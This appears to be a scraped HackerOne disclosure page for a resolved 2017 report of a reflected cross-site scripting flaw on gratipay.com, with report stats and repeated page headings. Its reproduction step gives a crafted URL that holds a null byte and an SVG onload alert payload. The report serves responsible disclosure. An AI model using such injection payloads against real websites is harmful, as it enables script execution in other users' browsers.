Reflected XSS - gratipay.com

Disclosed: 2017-08-24 23:01:51 By tungpun To gratipay

Medium

Vulnerability Details

# Summary I would like to report a Reflected XSS on gratipay.com. # Browsers Verified In * Firefox 55.0.2 (up to date) # Steps To Reproduce Goto this URL: `https://gratipay.com/on/npm/cx%00A<svg onload=alert(1)>` {F215426}

Actions

View on HackerOne

Report Stats

Report ID: 262852
State: Closed
Substate: resolved
Upvotes: 35

Reflected XSS - gratipay.com

Vulnerability Details

Actions

Report Stats

Share this report